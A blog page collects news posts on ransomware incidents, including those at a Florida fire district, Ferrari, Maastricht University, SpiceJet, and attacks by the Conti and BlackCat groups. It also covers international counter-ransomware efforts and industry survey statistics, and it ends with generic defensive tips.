Search This Blog

Showing posts with label Ransomware attack. Show all posts

SWFD Alerts Patients About the Ransomware Attack


Santa Rosa Beach, Fla.(WMBB) – The South Walton Fire District is facing a ransomware attack, that initially took place in May 2022. 

The threat actor reportedly targeted computer systems in the past Memorial Day. The hack may impact patient information, particularly the data the fire district transported between the years 2007 and 2019, says South Walton Fire District officials. 

While the officials confirmed that no information so far has been leaked, a thorough investigation of the incident is ongoing. The district officials as well are taking additional precautionary measures in order to secure the leaked information of the patients. 

Details of The Ransomware Attack 

On Memorial Day, SWFD discovered that someone had encrypted their dispatch system's data, acquired temporary access, and left a ransom note. 

“In essence, what somebody had done was get access to the system, encrypted the data, and left a ransom note for us to, basically, pay that ransom in order to get that data back […] Fortunately, internally we have a pretty robust mechanism in place to do backups. So we never had to engage that threat actor to gain that data back. We were able to re-install that data and be back up and running in about a day and a half,” says South Walton Fire District Fire Chief Ryan Crawford. 

Chief Crawford mentions that immediate measures were put into action after the district learned about the attack, by calling in federal, state, and local law enforcement. He says that they are continuously working on newer methods and technologies against threat actors in order to secure data. 

“We have already taken a number of additional layers of protection to try and mitigate the issue and prevent further instances like this from occurring,” says Crawford. 

Describing one of the cautionary measures, Crawford says, “One of the easiest ways is to take those archived medical records completely offline […] And so now, you know, those are really accessible to us for when people do public records requests and those sorts of things, it now requires us to go into the room where that server is located to pull that information rather than doing that remote.”

In addition to this, SWFD has also established a toll-free call center to solve queries regarding the incident and address related concerns. The call center agents can be reached at 1-800-939-4170 from 8 a.m. to 8 p.m. Central Time, Monday through Friday.  

International Summit Agrees Crack Down on Digital Tokens to Counter Ransomware

 

In recent years, hackers have repeatedly requested crypto as their primary currency for ransomware payments. 

Earlier this week, The White House's second International Counter Ransomware Initiative summit which included 36 nations led by the US agreed to improve ransomware prevention measures, specifically regarding the use of cryptocurrencies to finance ransomware operations. 

The summit was far more explicit on digital tokens than it was during its inaugural outing last year, as concerns continue to rise over the ease with which hackers are able to access the digital tokens. One of the primary issues identified by the Counter Ransomware Initiative (CRI) was the laundering of cryptocurrency. 

To counter money laundering and the financing of terrorism, the CRI group said its anti-crypto work will focus on sharing information regarding nefarious crypto wallets across agencies worldwide, run workshops to enhance blockchain tracing, and implement identity authentication for crypto transactions.

As a result of the summit, a number of nations agreed to the establishment of an International Counter Ransomware Task Force (ICRTF) that will initially be chaired by Australia and work "to coordinate resilience, disruption, and counter illicit finance activities." 

The Lithuanian Regional Cyber Defense Center (RCDC) will also begin playing host to a new "fusion cell" that will be utilized as a test case for a more extensive information-sharing program. 

Meanwhile, over the next year, the CRI will design a roadmap for the identification of primary targets and warn multiple law enforcement agencies, put together a toolkit for other organizations to use for the investigation of ransomware attacks, and design channels between private and public bodies to share ransomware information. 

Ransomware is becoming an increasingly popular modus operandi employed by cybercriminals to extort unwitting victims. According to data reported by banks to the U.S. Treasury Department, U.S. financial entities observed approximately $1.2 billion in costs associated with ransomware attacks in 2021, a nearly 200 percent surge compared to 2020. 

“We may approach the challenge of ransomware with a different lens — and in some cases, an entirely different set of tools — but we are all here because we know that ransomware remains a critical threat to victims across the globe and continues to be profitable for bad actors,” Deputy Secretary of the Treasury Wally Adeyemo stated. 

“In fact, we know that hackers around the world consider conducting ransomware attacks the most profitable scheme on the internet. More profitable even than selling illegal drugs via dark net markets and stealing and selling stolen credit cards.”

Ransomware Attacks Continue Targeting U.S. Industrial Organizations

 

Industrial sectors have been facing a hard hit by ransomware gangs in recent years, with manufacturing companies being exposed to a higher risk. U.S organisations have particularly succumbed to cyberattacks as they experience large spikes. 
 
According to the industrial cybersecurity firm Dragos, 25 of the 48 threat groups known to target industrial organizations and infrastructure were active in the third quarter of 2022. Several new ransomware groups including Sparta Blog, Bianlian, Donuts, Onyx, and Yanluowang are among those on the list. 
 
As per Dragos Q3 analysis regarding the ransomware attacks on industrial organizations, North America was the site of 36% of all reported cases worldwide, with 46 incidents being reported. This represents a significant 10% increase from the previous quarter when the region was hit by 25% of cases. 
 
On the other hand, the analysis also detected that the rate of attacks at a global level remained flat quarter over quarter, with 128 incidents for Q3 vs 125 in Q2. 
 
Most of the observed attacks were targeted at the manufacturing sectors, totaling 68%. Out of the confirmed attacks (those publicly reported, seen in the firm's telemetry, or confirmed on the Dark Web), 88 were against the manufacturing segments, especially those producing metal products, which experienced a total of 12 attacks. 
 
As indicated by Stephen Banda, senior manager of security solutions of Lookout, the manufacturing sector is developing at a swift pace, digitizing manufacturing, inventory tracking, operations, and maintenance increase agility and efficiency, with less production downtime and greater nimbleness. However, it also opens up new attack surfaces for threat actors. 
 
“To remain competitive, manufacturers are investing in intellectual property and new technologies like digital twins […] In short, manufacturers are transforming the way they produce and deliver goods – moving toward industrial automation and the flexible factory. This transformation, known as Industry 4.0, puts pressure on mobile devices and cloud solutions.” States Stephen Banda to Dark Reading. Yet for most manufacturers, security solutions still remain on-premises, he adds. 
 
“This creates efficacy and scalability challenges when tasked with protecting productivity solutions that have moved to the cloud[…]Security therefore must also move to the cloud to adequately safeguard manufacturing operations,” notes the Lookout senior manager.

 Cybersecurity Teams At Their Saturation Point

As ransomware attacks rise in frequency and expose people and organizations to new dangers, cybersecurity experts are near breaking point. One-third of cybersecurity experts are considering quitting their position in the next two years, according to a Mimecast poll of 1,100 workers worldwide.

According to the report, cybersecurity teams are under a lot of pressure as a result of rising cybercrime rates and increased media coverage of cyberattacks. Numerous cybersecurity team members are worried that a cyberattack will cost them one`s jobs, and others are having trouble keeping up with the pressure.

In order to keep businesses secure, Mimecast claimed that cybersecurity teams are under a pressure cooker of constant attacks, disruption, and burnout, which makes it even harder to recruit and maintain the necessary cybersecurity specialists. According to Dreyer, "the need for cyber skills is greater than ever, and a lack of workers with the necessary competence has generated a constantly growing skills deficit only within industry."

Nearly two-thirds (64%) of cybercrime leaders polled by Mimecast reported having encountered at least one ransomware assault in the previous year, and 77% reported that since 2021, the frequency of cyberattacks on their company has either increased or remained stable.

According to research by Mimecast, these attacks have personal implications for the health of cybersecurity experts. More than half of respondents (54%) claimed that ransomware attacks had a bad effect on their mental health, and 56% said that their job grew more stressful every time.

Mimecast estimates that 56% of assaults cost firms a total of more than $100,000. Given that 50% of decision-makers spend less than $550,000 a year on cybersecurity, one attack may consume 20% of the budget.
 
IT security managers, according to Mimecast, feel less accountable when an assault is successful, with 57% stating a ransomware attack would make them feel highly responsible, up from 71% last year. Another obstacle to better cybersecurity awareness could be liability. 



Indianapolis Housing Agency Seeks Experts' Help to Identify the Ransomware Attack Operators

 

After suffering a ransomware attack earlier this month, the Indianapolis Housing Agency confirmed taking experts' assistance to discover the source and operators of the attack. 

The hackers targeted the internal information and email system of the IHA. The private data of nearly 25,000 IHA residents plus the data from vendors and employees as well as financial transactions shared with the Department of Housing and Urban Development was put at risk. 

“When we first learned about the breach, we contacted IHA and made sure they were ramping up and scaling up the technological expertise that they need to protect the data that may be subject to compromise,” Indianapolis Mayor Joe Hogsett stated. 

Although the source of this ransomware attack is still under investigation, hackers typically secure access by sending an unsuspecting email. “Phishing attack is when you get an email that looks like it came from a friend or someone trustworthy, but that sender address has been spoofed,” Apu Kapadia, professor of computer sciences at Indiana University’s Luddy School of Informatics, Computing, and Engineering, stated. 

Because these attacks could have foreign origins, it is challenging to identify the offenders. Hogsett claims he is preventing similar cyberattacks from affecting other city agencies. 

“In the interest of full disclosure, we made sure that the city of Indianapolis was firewalled, appropriately, so that our data would not be breached as the result of an intrusion,” Hogsett said. 

To ensure that landlords and vendors receive salaries on time, the officials at IHS are collaborating with its bank and the US Department of Housing and Urban Development. 

Over the past few years, IHA is making headlines for the wrong reasons. IHA faced federal financial reviews after a federal whistleblower complained that the agency was operating at the whim of private investors who called their loans or moved to seize control of properties that were underperforming. 

Marcia Lewis, IHA’s interim executive director recently extended her temporary one-year tenure while Mayor Hogsett has delayed his search for her permanent replacement even though the agency is selling off its interest in properties or contracting for on-site management. 

According to IU Kelley Business School Professor Scott Shackelford, the risk of disclosing the hack is to tip off the hackers that the agency under attack and its clients are aware their data has been compromised while at the same time the victims need to be recommended to take precautionary measures to guard their data. 

“As soon as the hack happens, the clock does start ticking and unfortunately that means that folks’ information, their identities, could be compromised almost immediately. First, you can put a fraud alert on your credit report,” advised Shackelford. “This makes it much harder for criminals for example to open up new accounts in your name because there’s going to be a double checking that has to happen before they do that. You could also think about freezing your credit.”

Ferrari Refutes Ransomware Attack Following RansomEXX’s Online Claims

 

Italian vehicle designer Ferrari S.p.A might have become the latest victim of a ransomware attack. As per a Reuters report, internal documents belonging to the brand were published on a dark web leak site owned by ransomware group RansomEXX. 

However, the car manufacturer thwarted such claims, stating that there was no evidence of a ransomware attack or of a breach of the company's system. The company said that it is investigating the leak of the internal documents and that appropriate actions would be taken as needed, adding that there has been no disruption to its business and operations. 

Earlier this week Monday, Corriere Della Sera newspaper, citing the Italian website the Red Hot Cyber, reported that the luxury car designer had been a victim of a ransomware attack. 

 According to Red Hot Cyber, a notorious hacking group called RansomEXX claimed on its Tor leak site that it has breached Ferrari stealing 6.99 GB of data, which not only included internal documents but also datasheets and repair manuals, etc. The source of the documents remains unclear.  

In December 2021, ransomware gang Everest indirectly targeted Ferrari, when Italian manufacturing firm Speroni was hit by the ransomware group. That time around, the hackers siphoned 900 GB of data containing sensitive details regarding the firm’s partners such as Ferrari, Lamborghini, Fiat Group, and other Italian car manufacturers. 

According to Cybernews, the malicious hackers also got involved with Ferrari’s entry into the NFT market, taking control of the company’s subdomain and exploiting it to host an NFT scam almost immediately after Ferrari disclosed it would mint tokens based on their cars, earlier this year. 

RansomEXX has been operating since 2018, after updating its name in June 2020. The gang's modus operandi has become more potent and is targeting high-profile firms. 

Some of the high-profile organizations targeted by the RansomExx group in the past include the Texas Department of Transportation (TxDOT), Konica Minolta, Brazilian government networks, IPG Photonics, and Tyler Technologies. RansomExx has designed its own Linux version to make certain that they target all critical servers and data in a firm.

Maastricht University Retrieves Ransom Amount Paid in 2019

 

Earlier this month, the southern Maastricht University (UM) in Netherland with more than 22,000 students, revealed that it had retrieved the ransom paid after a ransomware assault that targeted its network in December 2019. 

After a detailed investigation of the incident, Fox-IT researchers attributed the attack to a financially motivated hacker gang tracked as TA505 (or SectorJ04). The hacking group has been active since at least 2014 and has primarily targeted retail and financial organizations. 

The hackers breached the university's systems through phishing e-mails in mid-October and installed Clop ransomware payloads on 267 Windows systems on December 23, after moving laterally via the network. 

After a week, the university decided to accede to the criminal gang's demand and paid a 30 bitcoin ransom (roughly €200,000 at the time) for the ransomware decryptor. This was partly because private data was in danger of being lost and students were unable to take an exam or work on their theses. Secondly, the rebuilding of all compromised systems from scratch or creating a decryptor were not viable options. 

"It is a decision that was not taken lightly by the Executive Board. But it was also a decision that had to be made," University explained in a blog post. "We felt, in consultation with our management and our supervisory bodies, that we could not make any other responsible choice when considering the interests of our students and staff."

However, as UM recently revealed, the local police traced and seized a wallet containing the cryptocurrency paid by the university as ransom in 2019.

"The investigation [..] eventually paved the way for the seizure of the cryptocurrency by the Dutch Public Prosecution Service. As early as February 2020, the investigation team froze a so-called wallet containing part of the paid ransom," UM said. The value of the cryptocurrencies found at that time was €40,000; at the current exchange rate, they are worth approximately €500,000."

Although this might appear like the university made a considerable profit within a relatively short time, the €500,000 seized by Netherlands' Public Prosecution Service represents significantly less than the damage inflicted during the ransomware attack. These seized funds are now in a bank account under the control of the law enforcement agents, and the Ministry of Justice has already initiated legal proceedings to transfer them to the university.

North Orange County Community College District Suffered Ransomware Attack

 

According to an official filing by the District, on Monday, January 10, 2022, the North Orange County Community College District (NOCCCD or the District) noticed malicious activity on both of the District’s college servers including Cypress College and Fullerton College. 

In response to the attack, the District launched an investigation with the assistance of outside computer forensic specialists to learn more about the attack and determine if any employee or student data was breached. The notifications in which the attack has been reported on their component campus sites revealed that this was a ransomware incident. 

On March 25, 2022, following the attack, the NOCCCD reportedly notified more than 19,000 people about a data security incident. It has begun sending out data breach notification letters to all employees and students whose information was breached due to the data security incident. The District furthermore said that it will send additional security letters if it notices other parties were impacted by the attack. 

The investigation has confirmed that files containing sensitive credential data of employees and students may have been compromised or removed from the District’s network. A copy of the notice was also posted on Fullerton College for International Students. 

While disclosing what types of data might have been compromised, the notice read, “name, and passport number or other unique identification number issued on a government document (such as Social Security number or driver’s license number); financial account information; and/or medical information.” 

The district said that they are also coordinating with the colleges to review and enhance existing policies related to data protection. Besides, they have successfully implemented multi-factor authentication as well as an advanced threat protection and monitoring tool to better security and safeguard data. Additionally, new and advanced cybersecurity training for employees is being implemented throughout the District.

New Variant of Magniber Ransomware is Targeting Windows 11 Users

 

Security analysts at 360 Security Center have unearthed a new strain of Magniber ransomware targeting Windows 11 systems. Since May 25, the attack volume of Magniber has surged significantly, and its primary transmission package names have also been upgraded, such as: win10-11_system_upgrade_software.msi, covid.warning.readme.xxxxxxxx.msi, etc. 

The ransomware is propagated via several online platforms, cracked software websites, fake pornographic websites, etc. When users visit these phony websites, they are lured to download from third-party network disks. 

According to researchers, the ransomware itself has not changed much, and can target multiple variants of Windows operating systems. The ransomware employs the RSA+AES encryption methodology to encrypt files. The RSA used is as long as 2048 bits, which is currently difficult to crack technically. 

After being encrypted by the ransomware, the file suffix is a random suffix, and each victim will have a separate payment page. If the ransom cannot be paid within the specified time, the link will be invalid. If the victim can pay the ransom within 5 days, he only needs to pay 0.09 Bitcoin, else the ransom will be doubled after 5 days. 

This is the second incident within two months hackers targeted Windows users. Earlier in April, the malicious actors employed fake Windows 10 updates to spread the Magniber ransomware strain. The fake Windows 10 updates were distributed under multiple names such as Win10.0_System_Upgrade_Software.msi and Security_Upgrade_Software_Win10.0.msi via platforms such as pirated sites, posing as legitimate cumulative or security updates. 

The malicious campaign started on April 8th, 2022, and has witnessed massive distribution worldwide since then. Meanwhile, it remains unclear how the fake Windows 10 updates are being promoted and distributed from fake warez and crack sites. 

According to security researchers, no safe decryptor exists for ransomware. Additionally, any weaknesses of the malware are also known to reverse its infection as of yet. The ransomware presently targets regular users and students, and not corporate customers. Thus, the users need to remain vigilant, avoid downloading cracked versions, and use legit sites only. 

The ransomware was first spotted in 2017 targeting victims in South Korea. Back in 2021, the ransomware was using the PrintNightmare exploit to Target Windows users, and earlier this year in January, it was distributed via Microsoft Edge and Chrome.

Ransomware Attack Disrupt the Operations of SpiceJet Flight

 

An attempted ransomware assault halted the operations of budget carrier SpiceJet on Tuesday night, leaving passengers stranded for hours across the country’s airports on Wednesday morning. 

The controversy started after a SpiceJet passenger, Mudit Shejwar, flagged the delay of his flight to Dharamshala even after 80 minutes of the boarding formalities were completed.

“On board flight SG2345 to Dharmshala, it's been already 80 mins since we boarded the plane, we have not taken off yet, the only communication is of some server down and issue with paper work for fuel, is this for real,” Mudit tweeted, tagging Spicejet, Civil Aviation Minister Jyotiraditya Scindia, Airport Authority of India and the Delhi airport authority. 

“Certain SpiceJet systems faced an attempted ransomware attack last night that impacted and slowed down morning flight departures today. Our IT team has contained and rectified the situation, and flights are operating normally now,” the airline tweeted. 

However, the reply did not sit well with the passenger, who said that all the passengers were stuck on the aircraft for close to four hours without food. “Operating normally?? We are stuck here since 3 hrs and 45 mins? Neither cancelling nor operating, sitting in the flight not even the airport. No breakfast, no response,” Shejwar replied. 

The airline did not disclose whether it had paid the attacker. Industry sources said the attack was identical to the one on Indigo in December 2020. Then, too, the airline had confirmed the attack and said some segments of data servers had been breached. However, little is known yet regarding the outcome of an investigation, or whether any payment was made. 

Last year, over 78 percent of Indian organizations surveyed were hit with ransomware attacks, up from 68 percent in 2020. The average ransom paid by Indian organizations to get their data encrypted was $1.2 million, says a report by British cybersecurity firm Sophos released earlier this month. 

According to the Directorate General of Civil Aviation, SpiceJet is the second-largest airline in India, operating a fleet of more than 90 aircraft, with a market share of 13.6% as of March 2019. 

In 2021, SpiceJet went through severe financial trouble result of grounding its fleet due to COVID-19 restrictions, The struggling airline’s accumulated losses neared ₹5,478 crore, while its liabilities exceeded assets by ₹6,347 crore during the same period.

Multiple Organizations Targeted by Conti Ransomware Worldwide

 

The Conti ransomware gang is wreaking havoc with its assaults around the globe. The latest victim is the Peru MOF – Dirección General de Inteligencia (DIGIMIN), the premier intelligence agency in Peru. 

The ransomware group claimed to have stolen 9.41 GB of data from the agency responsible for national, military, and police intelligence, as well as counterintelligence. Targeting intelligence agency could lead to the disclosure of secret and confidential documents and pose a threat to national security. 

Last week, the US Department of State offered a reward of up to $15 million for information on the threat actor. The reward includes $10 million for the identification or the location of the leaders of the Conti ransomware gang. 

Additionally, $5 million is offered for information that results in the arrest /or conviction of any individual in any country conspiring to participate in or attempting to participate in a Conti variant ransomware incident. The reward is offered under the Department of State’s Transnational Organized Crime Rewards Program (TOCRP).

"The Conti ransomware group has been responsible for hundreds of ransomware incidents over the past two years," the statement read. "The FBI estimates that as of January 2022, there had been over 1,000 victims of attacks associated with Conti ransomware with victim payouts exceeding $150,000,000, making the Conti ransomware variant the costliest strain of ransomware ever documented." 

Costa Rica President Rodrigo Chaves declared a national cybersecurity emergency over the weekend, following a financially motivated Conti ransomware attack against his administration that has paralyzed the government and economy of the Latin American nation. Shortly after the incident occurred in April, the former President Carlos Alvarado publicly declined to pay a $10 million ransom demand. In turn, Conti has published nearly all of the 672 GB of data stolen from the government. 

After targeting the Costa Rican government, the ransomware group posted a message on their news site that the assault was merely a “demo version.” The group also said the attack was solely motivated by financial gain as well as expressed general political disgust, another signal of more government-directed attacks. 

The assaults by the Conti ransomware group are really concerning and even forced a nation to declare a national emergency. Thus, security experts recommended organizations invest in robust preventive strategies, including anti-ransomware solutions, frequent backups of data, network firewalls, and email gateways.

Russian Group Attack on Bulgarian Refugee Agency

 

A ransomware group that shares strong ties with Russia warned on Wednesday that it will publicly post the files it has stolen from the Bulgarian government agency that is responsible for the refugee management.

LockBit 2.0 published a notice on the dark website saying it had files from the Bulgarian State Agency for Refugees under the Council of Ministers. “All available data will be published!” the notice read under the group’s trademark bright red countdown clock, which has a May 9 publication date. It's worth noting that there was no specific post for a ransom demand. 

According to the Sofia Globe, a news organization in the country’s capital, nearly 5.7 million Ukrainian refugees have fled their country since February and approximately 230,000 fled to Bulgaria, while 100,700 are remaining in the country. 

The official website of the agency remains active, however, a notice on the site’s home page reads, “due to network problems, the e-addresses of the State Agency for Refugees at the Council of Ministers are temporarily unavailable.”

Press contacted an official for a comment on the same matter but the agency didn’t immediately respond to the email. Later, a spokesperson at the Bulgarian embassy in Washington, D.C., said that he did not have information on the incident and would look into the matter. 

LockBit 2.0 is an updated version of LockBit, a ransomware variant that first was spotted in September 2019, as per the cybersecurity firm Emsisoft. Originally known as ABCD ransomware, LockBit is famous for the file extension appended to encrypted files, with the extension later updating to “LockBit”.  Moreover, in September, the group made headlines for launching its own leak website. 

“This is simply the latest in a very long list of hits on organizations which provide critical services...,” said Brett Callow, a threat analyst at Emsisoft. 

“...Hospitals, [search and rescue], fire departments, and charities for the disabled have all been targeted. The individuals involved with ransomware are conscienceless scumbags and the sooner we find a way to deal with the problem, the better.”

Kellogg Community College Closes after Ransomware Attack

 

Kellogg Community College in Michigan has closed its campuses and canceled classes after falling victim to a cyber-attack. It's a Battle Creek-based community college and according to the recent data, it serves approximately 7000 students annually. 

On its official website on Sunday the community posted a statement in which it has shared basic information about the ransomware attack that took place over the weekend. Following the attack, the cancellation of all Monday classes and the closure of its five campuses in Battle Creek, Coldwater, Albion, and Hastings were announced.

Furthermore, as the website notified that the attack is causing continued technology problems in the systems, the college told, “the technology issues we have been experiencing were caused by a ransomware attack that continues to affect our systems.” 

All five Kellogg campuses will remain closed while the security vulnerabilities are under investigation, however, the college community is hoping to reopen the campuses later this week. The community is also working to launch a “forced password reset for all students, faculty, and staff” to better secure the network.

“We want to reassure our faculty and students that we will take any actions necessary for students to complete course work in a timely manner and appreciate your patience and support in the meantime,” the alert read. 

According to the data, since 2021, various community colleges have been the victims of ransomware attacks, including Butler County Community College in Pennsylvania, Sierra College in California Lewis, and Clark Community College in Illinois. 

“As we have previously informed you, we have been the victim of a ransomware attack on our systems and services. We are still working to understand the full extent of this incident, but since our last update, we have been working diligently with our IRT team and have made progress in our restoration process,” said the Kellogg Community College.

FBI Issues Warning as BlackCat Ransomware Targets More Than 60 Organizations Worldwide

 

An FBI flash alert released this week suggests that the law enforcement agency has identified at least 60 ransomware attacks worldwide by the BlackCat (ALPHV) group between November 2021 and March 2022. 

The flash alert highlights the tactics, techniques, and procedures (TTPs) employed and indicators of compromise (IOCs) associated with ransomware groups spotted during FBI investigations.

According to the FBI's Cyber Division, BlackCat also tracked as ALPHV and Noberus "is the first ransomware group to do so successfully using RUST, considered to be a more secure programming language that offers improved performance and reliable concurrent processing."

BlackCat's ransomware executable is also highly customizable and is loaded with several encryption methods and options that make it easy to adapt attacks to a wide range of industrial organizations. "Many of the developers and money launderers for BlackCat/ALPHV are linked to Darkside/Blackmatter, indicating they have extensive networks and experience with ransomware operations," the FBI added. 

Security researchers recently revealed an increased interest from BlackCat operators in targeting industrial organizations. BlackCat affiliates often demand ransom payments of millions of dollars, but they have been observed accepting lower payments after negotiations with their victims. 

For initial access, the FBI explains, BlackCat employs compromised user credentials. Next, Active Directory user and administrator accounts are compromised and malicious Group Policy Objects (GPOs) are used to deploy the ransomware, but not before victim data is exfiltrated. 

As part of observed BlackCat assaults, PowerShell scripts, Cobalt Strike Beacon, and authentic Windows tools and Sysinternals utilities have been used. The malicious actors were also seen disabling security features to move unhindered within the victim’s network. 

As usual, the FBI recommends not paying the ransom, as this would not guarantee the recovery of compromised data, and urges organizations to proactively deploy cybersecurity defenses that can help them prevent ransomware attacks. 

Since the start of the year, the notorious group has taken credit for ransomware attacks on US schools like Florida International University and North Carolina A&T University and has already breached dozens of US critical infrastructure organizations. 

The group was first spotted in November 2021 and became known for aggressively posting details about its victims publicly. Emsisoft threat analyst Brett Callow and others previously said the group is a rebrand of the BlackMatter and DarkSide ransomware groups, something the FBI also highlighted in its notice.

Karakurt Hacking Group Linked to Conti and Diavol Ransomware Crew

 

Cybersecurity researchers from Arctic Wolf Networks published a blog post on Friday claiming that the cyber extortion group Karakurt is operationally associated with both the Conti and Diavol ransomware groups, operating as an exfiltration arm of the ransomware organizations. 

In a blog post, researchers said since its first attacks in August 2021, Karakurt hacking group has targeted more than 40 organizations in a number of industries in at least eight nations.

In conducting the in-depth research Tetra Defense, an Arctic Wolf firm, collaborated with Chainalysis and Northwave to examine the cryptocurrency wallets tied to the Karakurt hacker group, combined with their specific technique for data theft. The analysis confirmed that the group's membership overlaps with the Conti and Diavol ransomware crews. 

Tetra's report reveals the experience of a client firm that was targeted by the Conti group, and subsequently targeted again by a data theft perpetrated by the Karakurt hacking group. The analysis confirmed that the Karakurt attack employed an identical backdoor to exploit the client's systems as the earlier Conti assault. These associations debunk the Conti group’s assurance to victims that paying the ransom will shield them from future assaults.

"Such access could only be obtained through some sort of purchase, relationship, or surreptitiously gaining access to Conti group infrastructure," Tetra explained in its report. 

It is essential to distinguish the several types of cyber assault described right here, according to Tetra. In a ransomware attack, critical information is encrypted and the ransom is paid in exchange for a decryption key so that the victim can recover its data and resume operating. In a data theft, which has been the sole type of attack orchestrated by the Karakurt group, threat actors steal sensitive corporate data and demand money in exchange for not releasing it. 

The Karakurt attacks of this type — there have been more than a dozen to date, according to Tetra — also employed cryptocurrency wallets associated with Conti victim payment addresses, further strengthening the argument that the two groups' membership may overlap significantly. 

“Traditionally, we have seen the criminals honor their offers,” Nathan Little, senior vice chairman of digital forensics and incident response at Tetra stated. “Early on, when these [data theft attacks] began in 2019, it was widespread that corporations had been frightened sufficient that they’d pay, to not cover the incident, however to keep away from the results.”

In 2021, Ransomware Threats were Self-Installed

 

According to Expel, a managed detection and response (MDR) company, the majority of ransomware assaults in 2021 were self-installed. The revelation was made in the annual report on cybersecurity trends and predictions, 'Great eXpeltations'. 

Eight out of ten ransomware outbreaks were caused by victims unintentionally opening a zipped file containing malicious code. While, 3% of all ransomware cases were produced via abusing third-party access, and some 4% were caused by exploiting a software weakness on the perimeter. 

Ransomware is a sort of software that locks users out of the computer and demands payment in exchange for access. The data on the computer could be stolen, destroyed, or hidden, or the computer itself could be locked; some ransomware may try to infect other computers on the network.

BEC (business email compromise) efforts accounted for 50% of cases, with SaaS apps being the most common target. More than 90% of the attacks targeted Microsoft Office 365, with attacks against Google Workspace accounting for less than 1% of all events. Okta was the objective of the remaining 9%. 

Ransomware was responsible for 13% of all opportunistic attacks. Legal services, communications, financial services, real estate, and entertainment were the top five industries attacked. Furthermore, Expel discovered that 35 percent of web app hacks resulted in the deployment of a crypto miner.

Is the user at risk of being a victim of a ransomware assault due to security flaws?

  • The device in use is no longer cutting-edge. 
  • The device's software is out of date. 
  • No longer are browsers and/or operating systems patched. 
  • There is no suitable backup plan in place. 
  • Cybersecurity has received insufficient attention, and no solid plan has been put in place. 

How to Protect Oneself against Ransomware: 

  • Set up a firewall.
  • Have immutable backups. 
  • Staff Awareness Through Network Segmentation. 
  • Password Strengthening.
  •  Security Enhance Endpoint Security. 
  • Increase the Security of Your Email.
  • Use the Least Privilege Principle. 
  • Install ad blockers.

When it comes to combating ransomware, caution and the deployment of effective protection software, like with other forms of malware, are a good start. The development of backups is especially important when dealing with this form of malware, as it allows users to be well prepared even in the worst-case scenario.

Conti Ransomware Targets Taiwanese Apple and Tesla Supplier Delta Electronics

 

Taiwanese electronics manufacturing firm Delta Electronics was targeted by the Conti ransomware this week. The company operates as a supplier for major tech giants such as Apple, Tesla, HP, and Dell. 

According to a statement circulated on January 22, 2022, the company said the incident only affected non-critical systems, which had no significant impact on its operations. Delta is now working on restoring systems taken down during the attack and says it has hired the services of third-party security experts to help with the investigation and recovery process.

The company added that it had notified law enforcement agencies and hired information systems advisers to investigate the attack and to improve network security. While Delta's statement did not disclose who was behind the attack, an undisclosed information security company discovered a Conti ransomware sample deployed on the company's network. 

The Conti operators claim to have encrypted 1,500 servers and 12,000 computers out of about 65,000 devices on the company’s network. The Conti ransomware gang is said to have demanded a $15 million ransom payment from Delta and stopped leaking files stolen from its network. 

While Delta is still reportedly working with Trend and Microsoft's security teams to investigate the incident and claims that its production has not been affected, its website is still down one week after the attack. 

"The Conti ransomware group revealed a specific pattern part of the Delta attack leveraging Cobalt Strike with Atera for persistence as revealed by our platform adversarial visibility. Certainly, this attack is reminiscent of the REvil Quanta one affecting one of the Apple suppliers," Vitali Kremez, CEO of AdvIntel, stated. 

The Conti ransomware gang first emerged in 2020 and has been linked to the Russian-speaking Wizard Spider cybercrime group. The ransomware gang has targeted multiple high-profile organizations including Ireland's Department of Health (DoH) and Health Service Executive (HSE), and the RR Donnelly (RRD) marketing giant.

Conti has also been the subject of two government warnings. The first was by the U.S. Federal Bureau of Investigation in May, followed by a warning from the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency in September. 

“Cybercriminals continue to target organizations that provide a service or product to larger organizations with the expectation that they cannot suffer downtime due to a ransomware attack and will be inclined to pay up faster,” James McQuiggan, a security expert at security awareness training company KnowBe4 Inc., said. “While the attack was substantial, it appears the organization took the necessary actions to protect the critical equipment and systems within their organizations, as it seems that the cybercriminal group targeted corporate systems like their webpage.”

Conti Cyberattack Reported via Bank Indonesia

 

The Indonesian central bank was hit by ransomware, but the threat was reduced and the attack had no impact on the country's essential services. As per the bank, the situation was contained before it had a negative influence on BI's essential services, as Reuters initially reported.

"Last month, BI was informed of a ransomware attack. The bank was targeted by a cyber-attack. This is a true crime, the bank had witnessed," said Erwin Haryono, spokesman for Bank Indonesia. 

According to CNN Indonesia, the criminals allegedly took "non-critical" staff data and planted ransomware payloads on multiple computers on the bank's network during the attack on a central bank branch on the island of Sumatra. While Bank Indonesia didn't disclose who was behind the ransomware assault, security experts believe it was perpetrated by the Conti ransomware gang. 

Conti is a Russian-speaking ransomware cell that has infected over 400 companies globally, including 290 in the United States alone. Phishing emails (malicious URLs or attachments) or stolen/cracked windows remote protocol (RDP) credentials are primarily used attack vectors by Conti attackers to access victim networks. 

The group appears to target high-profile company networks, which infiltrate by using BazarLoader or TrickBot malware to gain illegal remote access to crucial devices. Threat actors strive to spread the infection by infecting additional linked devices after compromising the network. The cybercriminals then take records, encrypt servers and desktops, and demand a ransom payment. 

The Conti ransomware group claimed responsibility for the attack and listed Bank Indonesia among its victims on a Tor leaks site, claiming to have stolen about 14 GB (13.88 GB) of data.

Ransomware is used by cybercriminals to infiltrate selected network operations, infect critical data, and encrypt systems, rendering it unavailable to others. To decrypt infected systems, threat actors demand a ransom. If the victim continues to resist, hackers can threaten to expose secret information in order to put more pressure on the individual or organization.

Bank Indonesia should analyze the severity of the attack, according to Miftah Fadhli, a cybersecurity specialist at the NGO Institute of Policy Research and Advocacy (ELSAM), because it might "carry a major danger" and affect its transactions.

Cyber Attacks Are A Threat To The Energy Sector

 

According to a senior industry source, concern over cyber-attacks on power plants and electricity grids is "off the scale" in the UK energy sector. It just takes one component to fail for the entire chain to be disrupted, resulting in a cascade effect that affects our daily life. 

As winter approaches, the supply chain that serves the UK's crucial demand for gas and power is experiencing a broad energy crisis. The global gas crisis, the UK's electricity system, has already forced numerous elderly nuclear power facilities to take unplanned maintenance outages, while persistent energy shortages are expected to force further industry shutdowns. 

"The United Kingdom stands out in terms of cyber threats. Our energy system's cyber threats are over the charts," Steve Holliday stated. The UK parliament is reeling from a "sustained and aggressive" cyber-attack that has rendered MPs' email inaccessible.

So, why is the energy sector a target for cyber-attacks and why is it vulnerable? 

Any effect on the energy sector can have far-reaching consequences for entire towns and even countries. An attack on a power plant or a pipeline can result in widespread blackouts, disrupting transportation, heating, and other important economic functions. According to Mohammed AlMohtadi, the chief information security officer at Abu Dhabi's Injazat, the risk in the energy business derives from the usage of old industrial control systems that haven't been modernized in years and aren't properly linked across systems. 

